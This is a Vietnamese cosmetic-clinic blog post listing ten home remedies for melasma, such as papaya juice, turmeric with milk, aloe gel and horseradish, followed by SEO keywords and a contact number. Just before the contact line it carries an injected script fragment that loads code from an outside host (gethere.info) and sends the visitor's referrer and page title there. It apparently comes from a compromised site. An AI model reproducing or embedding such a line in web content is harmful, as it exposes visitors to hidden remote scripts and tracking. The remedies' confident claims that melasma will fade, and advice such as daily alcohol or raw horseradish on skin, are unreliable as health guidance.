Trị nám da hiệu quả với 10 mẹo đơn giản

0

Chuyên mục làm đẹp của Thẩm mỹ viện Phú Xuân hôm nay xin chia sẻ cho chị em những cách trị nám da hiệu quả với 10 mẹo đơn giản.

Xem thêm tại đây:

Trị nám da hiệu quả với 10 mẹo đơn giản

1. Trị nám với đu đủ

Để trị nám với đu đủ, bạn cần nghiền đu đủ xanh để lấy nước cốt và thoa đều lên vùng da có nám rồi rửa sạch da bằng nước lạnh sau 15 đến 20 phút. Áp dụng cách làm này 2 đến 3 lần/tuần giúp cải thiện độ sáng màu cho da.

2. Trị nám với bí xanh

tri-nam-da-hieu-qua-voi-10-meo-don-gian
Trị nám với đu đủ

Thực hiện:

– Bí xanh để cả vỏ, rửa sạch, cắt thành miếng rồi cho vào nồi đất ninh cùng với rượu và 300 ml nước trong khoảng 1 tiếng.

– Vớt bí xanh ra, dầm nát rồi lọc bỏ bã.

– Tiêp tục  đun nhỏ lửa cho tới khi bí xanh thành dạng cao hơi lỏng.

– Thoa cao bí xanh lên vùng da có nám hàng ngày.

3. Đào

Thực hiện: Lấy phần ruột của đào nhỏ rồi xay nhuyễn cùng 1 thìa cafe sữa chua và thoa đều lên da có nám trong vòng 20 phút. Sau đó rửa sạch da bằng nước ấm.

4. Sử dụng cam + sữa chua

tri-nam-da-hieu-qua-voi-10-meo-don-gian.1
Cam + sữa chua trị nám hiệu quả

Thực hiện: Cam ép lấy nước rồi trộn đều cùng sữa chua rồi đắp lên vùng da cần điều trị trong vòng 15 phút. Sau đó bạn rửa sạch lại da bằng nước lạnh. Mỗi tuần bạn cần trị nám bằng cách này 2 đến 3 lần.

5. Sử dụng cồn + trứng

Cách làm: Trộn lòng trắng trứng với cồn (dùng để sát trùng trước khi tiêm) cho thật đều rồi lấy bông thấm hỗn hợp và bôi lên chỗ nám hàng ngày sẽ có tác dụng cải thiện nám da.

6. Cà chua

Cà chua chứa lượng lớn vitamin C rất tốt cho da và mỗi ngày bạn chỉ cần uống 1 cốc nước ép cà chua hoặc đắp mặt nạ cà chua mỗi ngày sẽ thấy những vết nám đen mờ đi trông thấy.

7. Trị nám với nghệ

Để trị nám với nghệ, bạn hãy trộn thêm với sữa tươi để tạo thành hỗn hợp sệt rồi thoa đều lên vùng da có nám. Sau 20 phút, bạn rửa sạch lại da với nước lạnh.

8. Trị nám với đậu xanh

tri-nam-da-hieu-qua-voi-10-meo-don-gian.2
Trị nám với đậu xanh

Để trị nám bằng bột đậu xanh bạn hãy xay nhuyễn hỗn hợp này cùng ít nước rồi thoa đều lên vùng da có nám. Sau 15 đến 20 phút, bạn rửa sạch lại da bằng nước ấm. Mỗi tuần bạn nên áp dụng cách làm này 2 đến 3 lần.

9. Trị nám với lô hội

Thực hiện:

– Cắt lô hội lấy phần gel trong suốt (nhầy) bên trong.

– Thoa đều phần gel trên lên vùng da bị nám và massage nhẹ nhàng 1 – 2 phút.

– Sau 15 – 20 phút, bạn rửa sạch da với nước ấm.

10. Trị nám với củ cải ngựa

tri-nam-da-hieu-qua-voi-10-meo-don-gian.3
Trị nám với củ cải ngựa

Thực hiện: Cắt củ cải ngựa thành lát mỏng rồi chà xát trực tiếp trên da có nám và để khoảng 15 phút rồi rửa sạch lại da. Bạn cũng có thể sử dụng nước ép củ cải ngựa bôi lên vùng da bị nám và lặp lại 2 lần mỗi tuần cho đến khi vết nám mờ dần đi.

Trên đây là cách trị nám da hiệu quả với 10 mẹo đơn giản. Nhưng để trị nám nhanh và hiệu quả nhất, bạn nên trị nám theo các phương pháp tiên tiến của y học hiện đại. Tại Thẩm mỹ viện Phú Xuân, các phương pháp này đang được áp dụng rất thành công.

Các từ khóa liên quan:

  • cách trị nám da hiệu quả
  • cách trị nám da mặt hiệu quả
  • cách trị nám da mặt hiệu quả nhất
  • cách chữa nám da hiệu quả
  • cách trị nám da mặt bằng trái cây
  • trị nám da mặt bằng phương pháp dân gian
  • cách trị nám da mặt tại nhà
  • chữa nám da bằng hoa quả

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Tư vấn 24/7: 094 681 7777 - 0125 443 7777